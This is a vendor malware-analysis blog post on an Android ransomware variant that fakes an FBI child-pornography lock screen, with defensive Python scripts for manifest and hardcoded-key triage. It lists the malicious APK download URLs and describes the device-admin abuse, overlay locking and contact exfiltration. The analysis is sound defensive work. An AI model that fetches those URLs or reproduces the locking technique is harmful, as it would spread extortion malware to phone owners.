We have all read about the CryptoLocker malware that encrypts the victim's data and then asks for ransom money to decrypt it; we have also heard many real-life stories of politicians and mafia blackmailing people in order to "persuade" them into doing something. If you think you are safe from blackmail because you are neither a politician nor in organized crime, think again. CyphortLabs has started seeing Android malware that combines blackmail tactics with ransomware design in order to extort money from you. Back in July this year, an Android ransomware family named FBI/Lock started to emerge. CyphortLabs analyzed two samples which we believe to be a new variant of this family.
This article shares findings from our analysis of the following two samples:
MD5                                Source URL
bd4ed8b3b5d37f34fb63ce2798c585e9   http://kjkobll.girlamus18.com/p1/pornvideo.apk
1c2c8894ab12a38b7420c7e04ed690f3   http://vfaywnaul.yagirls18.us/pornvideo.apk
What is it about?
The app poses as a porn application. It displays the following videos, which entice the user into thinking that he has just installed a porn app.

But that isn't the case. After a few seconds, it displays the following screen from "The FBI", saying that your phone has been locked for containing pornographic material involving children, which violates the law. To scare you further, it claims that your face has been captured together with evidence of the violation and uploaded to an FBI data center. To clear the violation, it asks you to pay a penalty of $500 within 3 days, and instructs you to pay through MoneyPak.

Worse, the message stays on screen and takes over the whole display even if you press Home or try to exit, which makes the phone unusable. It also presents "evidence" of the violation: your phone details and, if one was captured, your picture.

Upon installation, it asks the user to activate it as a device administrator. This makes the malware harder to remove, because you must deactivate it under Device administrators before you can uninstall or delete the app.

If you cancel, it sends an intent that displays the device administrator activation screen again, forcing you into it.


It also asks for the device administrator policy to encrypt data. And when you try to disable the device administrator it has another trick: it returns a warning string, shown on the disable prompt, saying that all your data will be reset.
Although it contains code that encrypts and decrypts data, that function does not appear to be called from anywhere. This likely means the malware is still under development and is heading towards becoming the CryptoLocker of Android. It uses simple AES encryption, far simpler than the asymmetric encryption used by the Windows CryptoLocker, and the AES key is hardcoded in the app, so anyone who reverses the APK can recover the key and decrypt the data.
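Two of the checks above (is the key a compile-time literal, and is the encrypt/decrypt code ever called?) are easy to automate over decompiled output. The script below is an added example written for this article, not code from the sample or from Cyphort; the DECOMPILED_SOURCE it scans is a constructed, made-up Java fragment that imitates what a decompiler would print for an app like this one, and the class and method names in it are invented.

```python
"""Triage decompiled Android code for hardcoded symmetric keys and dead crypto.

Constructed example: DECOMPILED_SOURCE is invented to resemble decompiler
output for an app like the one analyzed above; it is NOT the real sample.
"""
import re

DECOMPILED_SOURCE = r'''
package a.b.c;

public class Zxqv {
    private static final String KEY = "0123456789abcdef";

    public static byte[] encryptData(byte[] data) throws Exception {
        SecretKeySpec spec = new SecretKeySpec(KEY.getBytes(), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, spec);
        return cipher.doFinal(data);
    }

    public static byte[] decryptData(byte[] data) throws Exception {
        SecretKeySpec spec = new SecretKeySpec(KEY.getBytes(), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, spec);
        return cipher.doFinal(data);
    }

    public static void uploadContacts(Context ctx) {
        Http.post(Config.CNC, ContactReader.dump(ctx));
    }
}

public class Main extends Activity {
    protected void onCreate(Bundle b) {
        Zxqv.uploadContacts(this);
        Zxqv.uploadContacts(this);
    }
}
'''

# Framework callbacks are invoked by Android, not by app code, so a zero
# call count for them is expected and must not be reported as dead code.
LIFECYCLE_CALLBACKS = {"onCreate", "onStart", "onResume", "onPause", "onDestroy",
                       "onReceive", "onStartCommand", "onBind", "onDisableRequested"}

_KEYSPEC = re.compile(r'new\s+SecretKeySpec\s*\(\s*(.+?)\s*,\s*"(\w+)"\s*\)')
_CIPHER = re.compile(r'Cipher\.getInstance\s*\(\s*"([^"]+)"')
_METHOD = re.compile(r'\b(?:public|private|protected)\s+(?:static\s+)?[\w<>\[\]]+\s+(\w+)\s*\(')


def _resolve_literal(expr, src):
    """Return the string literal behind a key expression, or None.

    Handles "literal".getBytes() and IDENT.getBytes() where IDENT is a
    String constant declared elsewhere in the same source."""
    m = re.match(r'"([^"]*)"', expr)
    if m:
        return m.group(1)
    ident = re.match(r'\w+', expr)
    if ident:
        const = re.search(r'String\s+' + re.escape(ident.group(0)) + r'\s*=\s*"([^"]*)"', src)
        if const:
            return const.group(1)
    return None


def find_hardcoded_keys(src):
    """List unique (algorithm, key) pairs whose key is a compile-time literal."""
    found = set()
    for key_expr, algo in _KEYSPEC.findall(src):
        key = _resolve_literal(key_expr, src)
        if key is not None:
            found.add((algo, key))
    return sorted(found)


def find_cipher_transformations(src):
    """Set of Cipher.getInstance transformations, e.g. to spot ECB mode."""
    return set(_CIPHER.findall(src))


def count_call_sites(src):
    """Map each declared method to the number of invocations outside its own
    declaration (lifecycle callbacks skipped, overloads not distinguished)."""
    counts = {}
    for name in _METHOD.findall(src):
        if name in LIFECYCLE_CALLBACKS:
            continue
        uses = len(re.findall(r'\b' + re.escape(name) + r'\s*\(', src))
        counts[name] = uses - 1  # subtract the declaration itself
    return counts


def unreferenced_methods(src):
    return sorted(n for n, c in count_call_sites(src).items() if c == 0)


if __name__ == "__main__":
    print("hardcoded keys:", find_hardcoded_keys(DECOMPILED_SOURCE))
    print("transformations:", find_cipher_transformations(DECOMPILED_SOURCE))
    print("never called:", unreferenced_methods(DECOMPILED_SOURCE))
```

On this constructed input the script recovers the literal key, reports the ECB transformation, and lists encryptData and decryptData as never called while uploadContacts has two call sites, which is the same picture the manual analysis above gives. Real decompiled output can hide the key behind string concatenation or a native library, so a None result from _resolve_literal means "look by hand", not "no key".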

What is happening in the background?
The onCreate() method of the main activity retrieves the contacts and posts them to its CnC server. For these two samples, it posts them to the following servers:

It also retrieves the following details:
- IMEI
- Network information
- Phone information and model
- Country
It also captures your picture by activating the front-facing camera, saving it under the folder CameraData777.

How does it lock your phone?
It registers a background service that continuously locks your screen via a WebView. First, it sets an alarm for 30 seconds later that will start the screen-locking service; that 30-second delay is probably meant to make you think the phone is not doing anything abnormal. When the alarm fires, the service starts a WebView layout, which lets the app render an HTML page itself without calling the browser, and loads a local HTML page named index.html from the assets folder.

Suspicious Manifest
This app declares a lot of dangerous permissions:
android.permission.READ_EXTERNAL_STORAGE
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.INTERNET
android.permission.SYSTEM_ALERT_WINDOW
android.permission.ACCESS_NETWORK_STATE
android.permission.WAKE_LOCK
android.permission.GET_TASKS
android.permission.WRITE_SETTINGS
android.permission.CAMERA
android.permission.READ_PHONE_STATE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.READ_CONTACTS
android.permission.GET_ACCOUNTS
The SYSTEM_ALERT_WINDOW permission allows the application to draw a system-alert window on top of every other app, which is how it takes over your screen; this is an early clue that it is ransomware. RECEIVE_BOOT_COMPLETED lets the app start on boot.
It also uses random names for its classes and has an autostart receiver.
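The manifest-level clues above (an over-broad permission set for a "video player", a receiver bound with BIND_DEVICE_ADMIN, and a BOOT_COMPLETED autostart receiver) can be scored mechanically from a decoded AndroidManifest.xml, as produced by apktool. The script below is an added example written for this article and is not Cyphort's tooling; the MANIFEST it parses is a constructed manifest that mirrors the permission list above, with invented package, class and component names rather than the real sample's, and the RISK_WEIGHTS are this example's own heuristic.

```python
"""Score a decoded AndroidManifest.xml for lock-screen ransomware indicators.

Constructed example: MANIFEST is invented to mirror the permission list in the
analysis above; it is not the manifest of either analyzed sample.
"""
import xml.etree.ElementTree as ET

# Attributes in the manifest live in the android: namespace; elements do not.
A = "{http://schemas.android.com/apk/res/android}"

MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.pornvideo">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <application android:label="pornvideo">
        <activity android:name=".Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".Rkwq"
                  android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin"
                       android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".Plmk">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:name=".Vbne"/>
    </application>
</manifest>
"""

# Heuristic weights (this example's own): how strongly each permission hints
# at screen-locking or data theft when requested by a supposed video player.
RISK_WEIGHTS = {
    "android.permission.SYSTEM_ALERT_WINDOW": 3,    # draw over every other app
    "android.permission.RECEIVE_BOOT_COMPLETED": 2,  # survive a reboot
    "android.permission.CAMERA": 2,                  # victim photo
    "android.permission.READ_CONTACTS": 2,           # contact exfiltration
    "android.permission.READ_PHONE_STATE": 1,        # IMEI
    "android.permission.GET_TASKS": 1,               # watch foreground app
    "android.permission.GET_ACCOUNTS": 1,
    "android.permission.WRITE_SETTINGS": 1,
}
DEVICE_ADMIN_WEIGHT = 3  # a bound DeviceAdminReceiver blocks plain uninstall


def parse_manifest(xml_text):
    return ET.fromstring(xml_text)


def declared_permissions(root):
    return sorted(p.get(A + "name") for p in root.iter("uses-permission"))


def device_admin_receivers(root):
    """Receivers that can be activated as device administrators."""
    return [r.get(A + "name") for r in root.iter("receiver")
            if r.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN"]


def boot_receivers(root):
    """Receivers whose intent filter fires at boot (autostart)."""
    out = []
    for r in root.iter("receiver"):
        actions = {a.get(A + "name") for a in r.findall("./intent-filter/action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            out.append(r.get(A + "name"))
    return out


def triage(xml_text):
    root = parse_manifest(xml_text)
    flags = [p for p in declared_permissions(root) if p in RISK_WEIGHTS]
    score = sum(RISK_WEIGHTS[p] for p in flags)
    for name in device_admin_receivers(root):
        flags.append("device-admin receiver: " + name)
        score += DEVICE_ADMIN_WEIGHT
    for name in boot_receivers(root):
        flags.append("boot receiver: " + name)
    return {"package": root.get("package"), "score": score, "flags": flags}


if __name__ == "__main__":
    for k, v in triage(MANIFEST).items():
        print(k, v)
```

Run against a manifest decoded with apktool, the output lists every flagged permission and component by name, so an analyst can go straight to the device-admin receiver class (the one to look for when cleaning the phone) instead of reading the manifest by hand.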

What can you do if you are infected with this ransomware?
The normal uninstall does not work for this kind of app, because your phone is locked and the app is an active device administrator. You need to restart the phone in safe mode, in which only the basic apps are started. Then go to Security settings, open the Device administrators page, and deactivate the malware app there. Now you can uninstall the app and reboot the phone in normal mode.
Key Takeaways
Given that much cybercrime follows the money, it was only a matter of time before ransomware like CryptoLocker moved from targeting Windows users to Mac users, and from desktops to smartphones. However, this style of malware, which combines blackmail tactics with ransomware design, represents a more significant advance in the malware threat; we refer to it as "ransommail" malware. Several features of this malware are worth noting:
- It is ransomware in that it holds the victim's reputation for ransom
- It is blackmail in that it threatens the victim with the legal consequences of viewing porn
- It is a different kind of social engineering attack in that it exploits human vulnerability: curiosity and pride in one's reputation
- It combines fraudulent representation (claiming to be from the FBI) with privacy-invading means on the smartphone (captured personal identification information and a photograph) in the act of blackmail
Given the growing population of Android phone users, we are bound to see more such malware attacks. Users should be careful to download mobile apps only from trusted app stores, and to watch what their apps are doing on their phones.
Users are advised to:
- Not install apps from untrusted sources. It is safer to install apps from known, reputable sources such as the Google Play Store.
- Have some level of protection. We all know that antivirus software cannot catch all the bad stuff, but having antivirus installed is much better than having no protection at all.
- Monitor running apps and processes. Most normal users never look at the running apps on their device, but you might find something there that should not be running and is probably malware. A quick Google search for the app name or the package name will give you a hint as to whether it is bad or not.
- Not activate apps as device administrators unless you are sure they are clean and safe.
- Pay attention to permissions. When a simple app that should have no need for the camera, contacts or SMS asks for such permissions, that is already a red flag.
I would like to thank Fengmin Gong and the rest of CyphortLabs team for helping me with this report.
The post Ransommail: Ransomware Mobile Twist With Blackmail appeared first on Cyphort.